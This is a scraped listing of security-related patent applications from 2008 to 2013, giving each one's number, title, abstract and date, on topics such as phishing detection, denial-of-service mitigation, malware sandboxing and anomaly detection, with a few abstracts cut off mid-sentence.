20080244739METHOD AND SYSTEM FOR RESILIENT PACKET TRACEBACK IN WIRELESS MESH AND SENSOR NETWORKS - A system and method for packet traceback in a network includes maintaining an identity number (ID) for each node in a network and generating a signature (e.g., a message authentication code (MAC)) using a secret key shared between each node on a forwarding path and a sink. Each forwarding node leaves a mark by appending its ID and a signature in the packet, either in a deterministic manner or with a probability. Upon receiving a packet at the sink, correctness of the signatures included in each packet is verified in the reverse order by which these signatures were appended. A last valid MAC is determined in the forwarding path to determine the locations of compromised nodes that collude in false data injection attacks.10-02-2008
20080235797Method, Apparatus, and Program to Forward and Verify Multiple Digital Signatures in Electronic Mail - A mechanism is provided for augmenting the mail header of a message with a list of digital signatures representing the chain of contributors to the message. The augmented header may also encode the actual contributions corresponding to each digital signature. The list is appended every time a message is forwarded. If a message has a portion with no corresponding digital signature or if one or more of the digital signatures is not trusted, the user may handle the message accordingly. Furthermore, a mail server or client may discard a message if the number of digital signatures exceeds a threshold to filter out unwanted messages, such as e-mail chain letters.09-25-2008
20080235795System and Method for Confirming Digital Content - A system for confirming digital content and methods for making and using same. The system and methods comprise determining how to search for a file. The system and methods comprise searching for a file and selectively obtaining a file. Further, they comprise verifying a file, and subsequently categorizing the file. A file that is verified can be known as such, thereby preventing the file to be re-verified. The file can be stored along with information about the file. The file and its information can be sent to a data reporting system or interface. An advantageous aspect of the present invention is the ability to perform semi-autonomously.09-25-2008
20080235794PROTECTION AGAINST IMPERSONATION ATTACKS - A computing method includes running on a user computer a first operating environment for performing general-purpose operations and a second operating environment, which is configured expressly for interacting with a server in a protected communication session and is isolated from the first operating environment. A program running in the second operating environment detects an attempt to imitate the protected communication session made by an illegitimate communication session that interacts with the first operating environment. The detected attempt is inhibited automatically.09-25-2008
20080235792Prefix matching algorithem - A prefix matching algorithm and method thereof are disclosed. The prefix matching engine for matching prefix of an input stream against prefixes of predefined signatures includes a prefix logic, a prefix look-up table storing prefix information of the predefined signatures and a table entry buffer. According to a portion of the input stream, the prefix logic is capable of accessing a predetermined number of table entries in the prefix look-up table and stores table entry values of the predetermined number of table entries in the table entry buffer. By examining the temporary table entry values in the table entry buffer, the prefix logic determines whether a prefix matching is found.09-25-2008
20080229414Endpoint enabled for enterprise security assessment sharing - An enterprise-wide sharing arrangement uses a semantic abstraction, called a security assessment, to share security-related information between security products, called endpoints. A security assessment is defined as a tentative assignment by an endpoint of broader contextual meaning to information that is collected about an object of interest. Endpoints utilize an architecture that comprises a common assessment sharing agent and a common assessment generating agent. The common assessment sharing agent is arranged for subscribing to security assessments, publishing security assessments onto a channel, maintaining an awareness of configuration changes on the channel (e.g., when a new endpoint is added or removed), and implementing security features like authorization, authentication and encryption. A common assessment generating engine handles endpoint behavior associated with a security assessment including assessment generation, cancellation, tracking, and rolling-back actions based on assessments that have expired. The common assessment generating engine generates and transmits messages that indicate which local actions are taken.09-18-2008
20110247069SYSTEM, METHOD AND COMPUTER PROGRAM PRODUCT FOR DETERMINING A RISK SCORE FOR AN ENTITY - In accordance with embodiments, there are provided mechanisms and methods for determining a risk score for an entity. These mechanisms and methods for determining a risk score for an entity can enable more effective monitoring of a system, can create more relevant data associated with the entity, etc.10-06-2011
20110247068Method And Apparatus For Enhanced Security In A Data Communications Network - A method and apparatus for enhancing the security of a data communications network. When a packet or other data unit enters the network, an associated geolocation is ascertain and a value representing that geolocation, that is, geolocation information, is inserted into the packet. When a packet is about to leave the network, the previously inserted geolocation information is analyzed, and in most cases, removed, and a decision is made according the analysis as to whether to forward the packet or discard it due to a suspect character. In some cases, suspect packets are instead flagged and forwarded, sometimes in connection with sending a warning to the intended recipient.10-06-2011
20080222723MONITORING AND CONTROLLING APPLICATIONS EXECUTING IN A COMPUTING NODE - A method and system for monitoring and controlling applications executing on computing nodes of a computing system. A status request process, one or more control processes, an untrusted application and one other application are executed on a computing node. The status request process receives and processes requests for the statuses of the untrusted and the other application. A first control process controls the execution of the untrusted application. A second control process controls the execution of the other application. The execution of the untrusted application terminates based on a failure of the untrusted application. A capability of the status request process to receive and process the requests for statuses, and a capability of the second control process to control the execution of the other application are preserved in response to the termination of the untrusted application.09-11-2008
20130179968SYSTEMS, METHODS, AND MEDIA FOR GENERATING SANITIZED DATA, SANITIZING ANOMALY DETECTION MODELS, AND/OR GENERATING SANITIZED ANOMALY DETECTION MODELS - Systems, methods, and media for generating sanitized data, sanitizing anomaly detection models, and generating anomaly detection models are provided. In some embodiments, methods for sanitizing anomaly detection models are provided. The methods including: receiving at least one abnormal anomaly detection model from at least one remote location; comparing at least one of the at least one abnormal anomaly detection model to a local normal detection model to produce a common set of features common to both the at least one abnormal anomaly detection model and the local normal detection model; and generating a sanitized normal anomaly detection model by removing the common set of features from the local normal detection model.07-11-2013
20130179967Method to deter softwear tampering using interlinked sub-processes - A method is disclosed for deterring the reverse engineering of computer software code. The method involves the recognition of an unauthorized access attempt by one of a plurality of linked sub-processes embedded in the computer software code. In response to the unauthorized attempt, each of the sub-processes begins a recursive execution, resulting in computer system resources being increasingly diverted to the linked sub-processes, making it difficult to continue unauthorized attempts to access the computer software code.07-11-2013
20130145462Phishing Processing Method and System and Computer Readable Storage Medium Applying the Method - A phishing processing method includes: an information input web page comprising an information input interface, through which information is transmitted to an information receiving address, is received. Determine if the information input web page is a phishing web page. If it is determined that the information input web page is the phishing web page, fake input information is transmitted to the information receiving address. When information for verification is received from an information transmitting address, if the received information for verification is the fake input information is determined. If the received information for verification is the fake input information, it is determined that the information transmitting address is a malicious address.06-06-2013
20130145461Security Method for Mobile Ad Hoc Networks with Efficient Flooding Mechanism Using Layer Independent Passive Clustering (LIPC) - A security method and system for Layer Independent Passive Clustering (LIPC) is presented. The inventive method and system maintains the states in the LIPC cluster formation protocol while adding a ‘Trusworthy’ event to each state and provides a methodology that depends on the state of the transmitting node to quantify Trustworthy and derive a Trust Confidence Value (TCV) to represent the level of confidence in quantifying ‘Trustworthy’. The invention dynamically computes a degree of trustworthiness for each participating network node and eliminates nodes from participating in the PC cluster formation protocol and packet forwarding if they do not meet established trust metrics. The security solution can also apply to PC-based Mobile Ad hoc Networks (MANETs). The novel system and method applies a multidimensional set of security algorithms to protect the LIPC cluster formation protocol from malicious attacks that compromise cluster formation and secure routing.06-06-2013
20130145463METHODS AND APPARATUS FOR CONTROL AND DETECTION OF MALICIOUS CONTENT USING A SANDBOX ENVIRONMENT - A non-transitory processor-readable medium storing code representing instructions to cause a processor to perform a process includes code to cause the processor to receive a set of indications of allowed behavior associated with an application. The processor is also caused to initiate an instance of the application within a sandbox environment. The processor is further caused to receive, from a monitor module associated with the sandbox environment, a set of indications of actual behavior of the instance of the application in response to initiating the instance of the application within the sandbox environment. The processor is also caused to send an indication associated with an anomalous behavior if at least one indication from the set of indications of actual behavior does not correspond to an indication from the set of indications of allowed behavior.06-06-2013
20120254997METHODS AND APPARATUSES FOR AVOIDING DAMAGE IN NETWORK ATTACKS - Methods and apparatuses in a client terminal (10-04-2012
20120254995SYSTEM AND METHOD FOR BELOW-OPERATING SYSTEM TRAPPING AND SECURING LOADING OF CODE INTO MEMORY - A system for protecting an electronic device against malware includes a memory, an operating system configured to execute on the electronic device, and a below-operating-system security agent. The below-operating-system security agent is configured to trap an attempted access of a resource of the electronic device, access one or more security rules to determine whether the attempted access is indicative of malware, and operate at a level below all of the operating systems of the electronic device accessing the memory. The attempted access includes attempting to write instructions to the memory and attempting to execute the instructions.10-04-2012
20120254993SYSTEM AND METHOD FOR VIRTUAL MACHINE MONITOR BASED ANTI-MALWARE SECURITY - A system for securing an electronic device includes a memory, a processor, one or more operating systems residing in the memory for execution by the processor, a resource of the electronic device communicatively coupled to the operating system, a virtual machine monitor configured to execute on the electronic device at a level below all of the operating systems of the electronic device accessing the resource, and a security agent configured to execute on the electronic device at a level below all operating systems of the electronic device accessing the resource. The virtual machine monitor is configured to intercept a request of the resource made from a level above the virtual machine monitor and inform the security agent of the request. The security agent is configured to determine whether the request is indicative of malware.10-04-2012
20130091568SYSTEMS AND METHODS FOR SECURE IN-VM MONITORING - Security systems can provide secure and efficient in-VM monitoring. An exemplary security system can be built upon hardware virtualization features and can comprise a virtual machine having a plurality of standard virtual address spaces, as well as a hidden virtual address space. While the standard virtual address spaces can be directly accessible by a kernel in the virtual machine, the hidden virtual address space can be hidden from the kernel, which can be absent a virtual page table corresponding to the hidden virtual address space. A security monitor can reside in the hidden address space, monitoring the kernel without being modifiable by the kernel. A processor can transfer focus from the standard virtual address spaces to the hidden virtual address space only through predetermined entry gates, and the processor can transfer focus from the hidden virtual address space to the standard virtual address spaces only through predetermined exit gates.04-11-2013
20130091569LOGIN INITIATED SCANNING OF COMPUTING DEVICES - Embodiments of the invention relate to systems, methods, and computer program products for login initiated remote scanning of computer devices. The present invention detects login to the network via access management systems. The login data provides information that identifies the device so that the device can be checked against a scan database to determine if and when a previous scan occurred. Based on the findings in the scan database determinations are made as to whether to perform a scan. Additionally, the level of scanning can be determined based on previous scan dates and previous scan results, which may dictate customized scanning. In addition, the priority of the impending scan may be dictated by previous scan dates and results. Further embodiments provide for assessing risk, such as risk scoring or the like, concurrently or in near-real-time with the completion of the scan so that alerts may be communicated.04-11-2013
20130091567DEVICE AND METHOD FOR ENERGY MANAGEMENT IN A HOUSEHOLD - An energy management system comprises one or more appliances, a remote device, and a communication device. In one embodiment, the communication device forms a physical connection with the remote device and thereafter a physical connection with an associated appliances. The first physical connection binds the communication to the remote device, thereby forming a secure connection over which inputs and outputs can be exchanged between the remote and the associated appliance when the communication device is connected to the appliance.04-11-2013
20130091566INTERNET PROTOCOL ADDRESS SPACE MANAGEMENT TO MITIGATE AND DETECT CLOAKING AND OTHER ABUSE - In one embodiment, an intelligent detection system 04-11-2013
20130097699SYSTEM AND METHOD FOR DETECTING A MALICIOUS COMMAND AND CONTROL CHANNEL - A method is provided in one example embodiment that includes detecting repetitive connections from a source node to a destination node, calculating a score for the source node based on the connections, and taking a policy action if the score exceeds a threshold score. In more particular embodiments, the repetitive connections use a hypertext transfer protocol and may include connections to a small number of unique domains, connections to small number of unique resources associated with the destination node, and/or a large number of connections to a resource in a domain. Moreover, heuristics may be used to score the source node and identify behavior indicative of a threat, such as a bot or other malware.04-18-2013
20130097701USER BEHAVIORAL RISK ASSESSMENT - A particular activity performed by a particular user of a computing device is identified, for instance, by an agent installed on the computing device. It is determined that the particular activity qualifies as a particular use violation in a plurality of pre-defined use violations. A behavioral risk score for the particular score for the user is determined based at least in part on the determination that the particular activity of the particular user qualifies as a particular use violation. Determining that the particular activity qualifies as a particular use violation can include determining that the particular activity violates a particular rule or event trigger corresponding to a particular pre-defined use violation.04-18-2013
20130097703SYSTEM AND METHOD TO LOCATE A PREFIX HIJACKER WITHIN A ONE-HOP NEIGHBORHOOD - Method, system and computer-readable device to locate a prefix hijacker of a destination prefix within a one-hop neighborhood. The method includes generating one-hop neighborhoods from autonomous system-level paths associated with a plurality of monitors to a destination prefix. The method also includes determining a suspect set of autonomous system identifiers resulting from a union of the one-hop neighborhoods. The method further includes calculating a count and a distance associated with each autonomous system identifier in the suspect set of autonomous system identifiers. The count represents how often an autonomous system identifier appears in the one-hop neighborhoods. The distance represents a total number of autonomous system identifiers from the autonomous system identifier to autonomous system identifiers associated with the plurality of monitors. Yet further, the method includes generating a one-hop suspect set including autonomous system identifiers in the suspect set that have a greatest sum of the count and the distance.04-18-2013
20130097700Phishing Detecting Method and Network Apparatus and Computer Readable Storage Medium Applying the Method - A phishing detecting method includes: a web-page accessing request for accessing a target web page at a target address is received; the target web page from the target address is obtained; the target web page is snapshotted to obtain a present page snapshot; the present page snapshot is compared with several pre-stored page snapshots stored in a database, wherein each of the pre-stored page snapshots corresponds to a pre-stored address; if the present page snapshot matches one of the pre-stored page snapshots, the target address is compared with the pre-stored address, corresponding pre-stored page snapshot of which matches the present page snapshot; if the target address does not match the pre-stored address, the corresponding pre-stored page snapshot of which matches the present page snapshot, it is determined that the target web page is a phishing web page.04-18-2013
20130097702WEBSITE DEFACEMENT INCIDENT HANDLING SYSTEM, METHOD, AND COMPUTER PROGRAM STORAGE DEVICE - A website defacement incident handling system and associated methodology and non-transitory computer program storage device for detecting a defacement of a website and taking appropriate corrective action upon detection of the defacement. The website defacement incident handling system receives web page information and snapshot images corresponding to websites and performs comparisons against corresponding information and snapshot images of a reference website. Probability scores indicating the likelihood that a website has been defaced are calculated based on the comparisons and corrective actions are taken as appropriate to protect the affected website.04-18-2013
20130104229Private Domain Name Registration - A service for protecting the privacy of domain name registrants while preserving the registrant's ability to directly change the registration information or transfer the registration. A whois record is created that reflects the registrant's actual identity but contains contact information that is entirely associated with a privacy service.04-25-2013
20130104228STEALTH NETWORK NODE - A method, a network node, and a set of instructions are disclosed. A network interface 04-25-2013
20130125236RENDER ENGINE, AND METHOD OF USING THE SAME, TO VERIFY DATA FOR ACCESS AND/OR PUBLICATION VIA A COMPUTER SYSTEM - A method and system to verify active content at a server system include receiving, at the server system a communication (e.g., an e-mail message or e-commerce listing) that includes active content that is to be made accessible via the server system. At the server system, the active content is rendered to generate rendered active content. The rendered active content presents a representation of information and processes to which an end user will be subject. At the server system, the rendered active content is verified as not being malicious.05-16-2013
20130125235Method, Apparatus and Program for Detecting Spoofed Network Traffic - A method, an apparatus and a program for detecting spoofed Internet Protocol (IP) traffic directed to a network having a plurality of autonomous systems (AS) is provided. The method comprises receiving an incoming packet through an AS, the incoming packet containing a source IP address and a destination IP address, acquiring a corresponding source and destination IP address prefixes, converting the corresponding source and destination IP address prefixes into a source AS number and a destination AS number, determining if the incoming packet arrived from an unexpected source based upon the corresponding destination IP address prefix and the converted source and destination AS number using an unexpected pair tuple table generated from network routing information and generating an alert indicating that the incoming packet is not allowed to enter the network.05-16-2013
20130133064REVERSE NFA GENERATION AND PROCESSING - In a processor of a security appliance, an input of a sequence of characters is walked through a finite automata graph generated for at least one given pattern. At a marked node of the finite automata graph, if a specific type of the at least one given pattern is matched at the marked node, the input sequence of characters is processed through a reverse non-deterministic finite automata (rNFA) graph generated for the specific type of the at least one given pattern by walking the input sequence of characters backwards through the rNFA beginning from an offset of the input sequence of characters associated with the marked node. Generating the rNFA for a given pattern includes inserting processing nodes for processing an input sequence of patterns to determine a match for the given pattern. In addition, the rNFA is generated from the given type of pattern.05-23-2013
20130133065SYSTEM AND METHOD OF INDICATING THE STRENGTH OF ENCRYPTION - A method and system are provided for secure messaging on mobile computing devices. The method and system provide for an indication of a security trust level associated with a security method used with an electronic message.05-23-2013
20080209555Approach for proactive notification of contract changes in a software service - An approach is provided for proactive notification of contract changes in a software service. According to the approach, when the executable code of a composite application operable to access the service is generated, an initial copy of a contract that describes the service is retrieved. A baseline representation of the contract is generated based on the initial copy of the contract. When the composite application is being executed, a determination is made based on the baseline representation whether the contract has experienced any changes. In response to determining that the contract has experienced a change, a notification is sent indicating that the contract has experienced the change.08-28-2008
20110214180Network Amplification Attack Mitigation - An improved network protocol for mitigating network amplification attacks is provided. The absolute network load that any transient distributed attack can cause is bounded based on a resource crediting scheme. The protocol accumulates “credit” upon reception and detection of candidate attack request packets, and draws against that credit when transmitting responsive packets. In some implementations, the time frame of such an attack is also bounded using time limits applied to a resource crediting scheme. Other resources may also be bounded by the resource crediting scheme, including without limitation CPU utilization, storage capacity, power, etc.09-01-2011
20080201777Method and Agent for the Protection Against the Unauthorized Use of Computer Resources - Method and agent for preventing a hostile use of computer resources by an application running on a workstation. A list of services that are not allowed for access by unspecified applications is provided, and when such unspecified application runs on the workstation, the application is prevented from accessing any resource directly. Any direct or indirect request for access to specific services is analyzed, to determine whether such request is allowable according to the list. The workstation processes the request if it is allowable. The unspecified application is prevented from accessing the requested resource if the request is not allowable. The resource may be any local or remote resource, such as, memory allocation, files, directories, operations with files and directories, such as copy, delete or compress, or any other operation leading to a permanent change in the workstation or its periphery.08-21-2008
20080201776Method And Computing System For Avoiding Denial Of Service Attacks - A computing system configured to receive service requests, comprising a memory for storing service request data and a service request handler. The computing system is configured to respond to a service request by registering a call back routine configured to pass details of the service request to the memory if executed by a panic process upon a system crash, the memory is configured to store the details of the service request passed to it, and the service request handler is configured to compare the service request to the service request data in the memory and to deny the service request if the service request matches a predefined portion of the service request data.08-21-2008
20110225653MONITORING SYSTEM, PROGRAM-EXECUTING DEVICE, MONITORING PROGRAM, RECORDING MEDIUM AND INTEGRATED CIRCUIT - To aim to provide a monitoring system and a program execution apparatus that are capable of maintaining the security intensity even in the case where an unauthentic install module is invalidated. Install modules 09-15-2011
20110225650SYSTEMS AND METHODS FOR DETECTING AND INVESTIGATING INSIDER FRAUD - Systems, methods, and apparatus, including computer programs encoded on computer storage media, for detecting insider fraud. One method includes identifying one or more insider threat detection rules for an enterprise and obtaining behavioral data for an enterprise insider from multiple behavioral data sources. The enterprise is associated with a plurality of enterprise insiders, and the behavioral data describes at least one action of the first enterprise insider. The method further includes determining a threat score for the first enterprise insider based on the behavioral data for the first enterprise insider and one or more of the insider threat detection rules and initiating, when the threat score satisfies a threat threshold, one or more protective actions.09-15-2011
20130145464Network Overload Detection and Mitigation System and Method - Systems and methods are provided for detecting and mitigating overload conditions affecting one or more computers attached to a network, such as overloads resulting from distributed denial of service (DDoS) attacks, for example. According to some described embodiments, an attempted overload condition is detected, e.g., by a system, through following a method, or both, within a data cleaning center. Detection may be achieved, e.g., by analyzing data packets traveling over the network to identify packets that bear characteristics that may be associated with DDoS attacks, and this analysis may include examination of the packets' data payloads. Mitigation, in turn, may include discarding some data packets, redirecting network traffic, or some combination thereof.06-06-2013
20110239297TAMPERING MONITORING SYSTEM, CONTROL DEVICE, AND TAMPERING CONTROL METHOD - A management device detects whether any normal monitoring module that has not been tampered with exists by referring to monitoring results received from an information security device and selects, when existence is detected, one of the monitoring modules and assumes that the selected monitoring module has been tampered with. The monitoring device then successively applies a procedure to monitoring modules other than the selected monitoring module by referring to the monitoring results, starting from the selected monitoring module, the procedure being to assume that any monitoring module determining that a monitoring module assumed to have been tampered with is normal has also been tampered with. As a result of the procedure, when all of the monitoring modules are assumed to have been tampered with the management device determines the selected monitoring module to be a normal monitoring module that has not been tampered with.09-29-2011
20120278886DETECTION AND FILTERING OF MALWARE BASED ON TRAFFIC OBSERVATIONS MADE IN A DISTRIBUTED MOBILE TRAFFIC MANAGEMENT SYSTEM - Systems and methods for detections and filtering of malware based on traffic observations made in a distributed mobile traffic management system are disclosed. One embodiment of a method which can be implemented on a system includes, collecting information about a request or information about a response to the request initiated at the mobile device and using the information collected about the request or the response to identify or to detect malicious traffic. The information that is collected about the request or response received for the request initiated at the mobile device can be further used to determine cacheability of the response.11-01-2012
20120278885MAINTAINING DATA INTEGRITY - Aspects of the present invention maintain data integrity of a monitored data object in a monitored storage repository. A first security value for the monitored data object is determined. The first security value is stored along with an authentic copy of the monitored data object in the secure repository. The second security value for the monitored data object is determined after a predetermined time interval. The first security value is compared with the second security value. An alert is generated in response to determining a difference between the second security value and the first security value.11-01-2012
20130152195Replay Attack Protection With Small State For Use In Secure Group Communication - A replay detection technique with “small state” (e.g., with relatively few bits of state information). A sending node generates a random number r06-13-2013
20130152196THROTTLING OF ROGUE ENTITIES TO PUSH NOTIFICATION SERVERS - Techniques for throttling of rogue entities to push notification servers are described. An apparatus may comprise a processor and a memory communicatively coupled to the processor. The memory may store an application, the application maintaining a monitored domain table, the application maintaining an offending domain table, the application operative to receive an incoming request from a client in a domain, to detect harmful activity based on the request, and to respond to the harmful activity based on one or both of the monitored domain table and the offending domain table. Other embodiments are described and claimed.06-13-2013
20130152197EVENT DETECTION METHOD AND APPARATUS IN A DISTRIBUTED ENVIRONMENT - An event detection method in a distributed environment includes, when a non-parsable event occurred during grammar parsing, executing the following process until the first grammar parser module obtains a detection result, including the event that the current grammar parser module can not parse in a scheduling request as a next event to be detected and sending it to the grammar control module, scheduling, by the grammar control module, other grammar parser module as the target grammar parser module for further parsing based on the scheduling strategy table, performing grammar parsing based on the local parsing table in the scheduled target grammar parser module, returning parsing results to the grammar control module for further parsing when no non-parsable event is found; or repeating the above process with the target grammar parser module as a new current grammar parser module when an non-parsable event is found.06-13-2013
20130152198Anomaly Detection To Implement Security Protection of a Control System - An anomaly detection mechanism is provided that detects an anomaly in a control network, and includes an identifying unit to receive event information on an event that occurs, and to identify a group including a resource related to the event information by referring to a configuration management database for retaining dependence relationships between processes and resources including a control system; a policy storing unit to store one or more policies each of which associates one or more actions with a condition defining a situation suspected to have an anomaly; an adding unit to acquire group-related information needed for application to the one or more policies, and to add the acquired information to the event information; and a determining unit to apply the event information to the one or more policies and to determine the one or more actions associated with the matched condition as one or more actions to be taken.06-13-2013
20100299753Method of Preventing TCP-Based Denial-of-Service Attacks on Mobile Devices - Provided is a method of preventing a Transmission Control Protocol (TCP)-based Denial of Service (DoS) attack on a mobile device. The method efficiently prevents a DoS attack on a mobile device, which wirelessly and constantly transmits TCP packets to the mobile device using a TCP protocol and thereby exhausts resources of a wireless network and also battery power of the mobile device depending on a battery. An attack conventionally made in a wired network by abusing TCP-based three-way handshaking is more severe in the wireless network of mobile devices. To prevent such an attack on a mobile device, the method capable of checking three-way handshaking and each transition operation makes the mobile device check whether or not a received TCP packet is valid. Therefore, it is possible to efficiently prevent a DoS attack from exhausting wireless resources and battery power of the mobile device.11-25-2010
20100299752Identification of Content - Systems and methods for identifying content in electronic messages are provided. An electronic message may include certain content. The content is detected and analyzed to identify any metadata. The metadata may include a numerical signature characterizing the content. A thumbprint is generated based on the numerical signature. The thumbprint may then be compared to thumbprints of previously received messages. The comparison allows for classification of the electronic message as spam or not spam.11-25-2010
20120260338ANALYSIS OF SCRIPTS - A method and system for analyzing scripts. A script is analyzed to determine whether the script includes malicious content. A computer executes at least two text blocks of code derived from a script of a web page. The execution of a text block of the at least two text blocks generates an additional text block of code. The computer determines whether the additional text block includes new code that is malicious. If so, the computer prevents transmission of the web page to a client computer. If not, the computer transmits the web page to the client computer.10-11-2012
20090144823Method and System for Mobile Network Security, Related Network and Computer Program Product - A honeypot system for protecting a mobile communication network against malware includes one or more user-less mobile devices including a monitoring module for monitoring the events conveying software applications in the associated mobile device as well as a controller client module that emulates human-like interaction with the user-less devices as a function of the events monitored. The system controllably performs, for the applications conveyed by the events monitored, one or more of the following steps: i) installing the application on the device; ii) executing the application installed on the device; and iii) de-installing the application from the- device. After any of these steps, the state of the device is checked in order to detect if any anomalous variation has occurred in the state of the device indicative of the device being exposed to the risk of malware. If any anomalous variation is detected, the system issues a malware alert message.06-04-2009
20130205389DATA PROCESSING APPARATUS AND METHOD FOR PROTECTING SECURE DATA AND PROGRAM CODE FROM NON-SECURE ACCESS WHEN SWITCHING BETWEEN SECURE AND LESS SECURE DOMAINS - A data processing apparatus includes processing circuitry and a data store including a plurality of regions including a secure region and a less secure region. The secure region is configured to store sensitive data accessible by the circuitry when operating in a secure domain and not accessible by the circuitry when operating in a less secure domain. The data store includes a plurality of stacks with a secure stack in the secure region. Stack access circuitry is configured to store predetermined processing state to the secure stack. The processing circuitry further comprises fault checking circuitry configured to identify a first fault condition if the data stored in the predetermined relative location is the first value. This provides protection against attacks from the less secure domain, for example performing a function call return from an exception, or an exception return from a function call.08-08-2013
20130205388SELECTIVE RANDOMIZATION FOR NON-DETERMINISTICALLY COMPILED CODE - A method and an apparatus for runtime compilation that generates non-deterministic and unpredictable code to protect against un-trusted code attacks are described. The runtime compilation may be based on heuristic rules without requiring deterministic behavior reduction operations for all the code generated. The heuristic rules may include estimations on, for example, runtime overhead or cost incurred for code protection, amount of code protection required and/or other applicable factors and their relationships.08-08-2013
20100319069INTEGRATED CYBER NETWORK SECURITY SYSTEM AND METHOD - A computer system for providing security in a computer network includes: a global sensor device configured to determine potential threats to the computer network; a global threat manager device configured to determine identification information associated with the potential threats; and a local security device configured to detect the existence of the potential threats based on the identification information and to take remedial action in response to the potential threats. The system also provides for responding to network attacks in a sufficiently granular method that is optimized according to the current state of the network by maintaining a virtual model of the network; detecting a network attack; generating a plurality of alternative candidate remedial responses to the network attack; and determining a potential network impact of each candidate remedial response using the virtual model of the network.12-16-2010
20120284792System and Method for Aggressive Self-Modification in Dynamic Function Call Systems - Provided are a system and method for software obfuscation for transforming a program from a first form to more secure form that is resistant to static and dynamic attacks. The method utilizes a sophisticated pre-analysis step to comprehend the function-call structure, the function-call layout, and the entire function call graph of the program, in order to determine strategic points in the program for changing the program. This provides resistance to static attacks by transforming the original function-call layout to a new layout. Changing the layout may include changing the function boundaries. The method also provides resistance to static attacks by transforming the original function-call structure to a new structure to be able to self modify as the transformed program executes in memory. Changing the function-call structure may include modifying when and how functions are called, and/or choosing random paths of execution that lead to the same result.11-08-2012
20120284791ROBUST ANOMALY DETECTION AND REGULARIZED DOMAIN ADAPTATION OF CLASSIFIERS WITH APPLICATION TO INTERNET PACKET-FLOWS - Sound, robust methods identify the most suitable, parsimonious set of tests to use with respect to prioritized, sequential anomaly detection in a collected batch of sample data. While the focus is on detecting anomalies in network traffic flows and classifying network traffic flows into application types, the methods are also applicable to other anomaly detection and classification application settings, including detecting email spam, (e.g. credit card) fraud detection, detecting imposters, unusual event detection (for example, in images and video), host-based computer intrusion detection, detection of equipment or complex system failures, as well as of anomalous measurements in scientific experiments.11-08-2012
20120284790LIVE SERVICE ANOMALY DETECTION SYSTEM FOR PROVIDING CYBER PROTECTION FOR THE ELECTRIC GRID - Provided is a method of improving security in an electrical grid network. The method includes configuring a lifecycle map associated with an operation in the electrical grid network, the lifecycle map including at least a start configuration, a final configuration, and a plurality of valid events arranged to link the start configuration and the final configuration, the start configuration and the final configuration corresponding to particular states of the electrical grid network. The method also includes monitoring at least one of messages and device configurations in the electrical grid network to detect one or more live events associated with the operation and comparing the plurality of live events to the lifecycle map to identify an anomaly in the live events.11-08-2012
20130160115SANDBOXING FOR MULTI-TENANCY - Systems and methods according to various embodiments disclose a worker process manager adapted to spawn one or more worker processes on a server and to load an application on each of the worker processes. The worker process manager is adapted to isolate the one or more worker processes from each other and to control resource usage by the worker processes. A resource manager is adapted to detect applications that overuse system resources. The worker process manager is adapted to isolate worker processes and to control resource usage using one or more of the following techniques: least-privilege execution, messaging isolation, credentials isolation, data isolation, network isolation, fair share resource usage, and managed runtime security. Heuristic algorithms are used to detect applications that frequently overuse system resources that are unchargeable and that cause system unresponsiveness.06-20-2013
20130160118Methods, Communication Networks, and Computer Program Products for Monitoring, Examining, and/or Blocking Traffic Associated with a Network Element Based on Whether the Network Element Can be Trusted - A communication network is operated by determining whether a network element can be trusted and monitoring traffic associated with the network element based on whether the network element can be trusted. At least some of the monitored traffic may be selected for examination based on the degree of trust for the network element. At least some of the monitored and/or examined traffic is selected to be blocked based on the degree of trust for the network element.06-20-2013
20130185794BASE STATION FOR DETECTING DENIAL-OF-SERVICE ATTACKS IN COMMUNICATION SYSTEM AND METHOD FOR CONTROLLING THE SAME - Provided is a base station for detecting Denial-of-Service (DoS) attacks in a communication system and a method for controlling the same. The base station includes a first estimator for estimating, for a predetermined time, a reception rate of data that is received at the base station from a communication network to be transmitted to at least one wireless terminal; a second estimator for estimating, for a predetermined time, a bandwidth allocated for transmission of data to the at least one wireless terminal, based on at least one of feedback information transmitted from the at least one wireless terminal and channel capacity of the base station; and a controller for calculating a ratio of the bandwidth to the reception rate for the at least one wireless terminal, and determining whether there is a DoS attack, using the calculated ratio.07-18-2013
20130185793Apparatus and Method for Tracking Network Path - An apparatus and method for effectively tracking a network path by using packet information generated when visiting a Web page are provided.07-18-2013
20110307953Radio Channel Metrics for Secure Wireless Network Pairing - Technologies are generally described for using metrics of radio path characteristics within a wireless network to establish signal signature vectors. These signal signature vectors may be used as a shared secret between network nodes to establish affirmative identification. For example, a signal signature vector may be established when a new node sends a fixed number of packets to the existing nodes and the existing nodes send a fixed number of other packets back to the new node. The number of properly received packets can be counted to establish a success probability between the new node and each existing node. These probabilities can be normalized and quantized to generate signal signature vectors at each node. Without every transmitting any of the vectors, the vector at the new node should be highly correlated to the vectors at existing nodes since the pair-wise channels between each of the nodes should be reasonably symmetrical.12-15-2011
20110321162Methods And Systems For Providing Security For Page Framing - Techniques for analyzing a page to be presented by a browser running on a computing platform. The page is disabled. The page is tested to determine if the page is framed by a second page. The page is enabled if the testing indicates that the page is not framed by a second page. Each level of a hierarchy of framed pages is inspected to determine whether each level is authorized. The page is enabled if the inspecting indicates that each level of the hierarchy of framed pages is authorized.12-29-2011
20110321161MITIGATING EXCESSIVE OPERATIONS ATTACKS IN A WIRELESS COMMUNICATION NETWORK - A technique for mitigating excessive operations attacks in a wireless communication network includes receiving message requests from stations, detecting an excessive operation attack, checking if a received request is a first request or a retry request, and ignoring any first requests. The method can also include saving information about the first request, and wherein if checking reveals that the received request is a retry request, the method further confirms that the retry request and the saved information about the first request meet matching conditions, whereupon the retry request is further processed as normal. Since attacks rarely utilize retry requests, this technique effectively ignores attack messages.12-29-2011
20110321160SYSTEMS AND METHODS TO DETECT MALICIOUS MEDIA FILES - Systems and method to detect malicious media file are described. In one example, an apparatus including a network connection, a memory, and a programmable processor communicatively coupled to the memory is discussed. The memory can include instructions, which when executed by the programmable processor cause the apparatus to receive a data stream from the network connection and detect at least a portion of a media file within the data stream. The instructions can also cause the apparatus to determine a file type of the media file and extract the media file from the data stream. Further, the instructions cause the apparatus to parse the media file to location a suspicious tag, extract an embedded URL from the suspicious tag, determine with the embedded URL is malicious, and block the media file if the embedded URL is malicious.12-29-2011
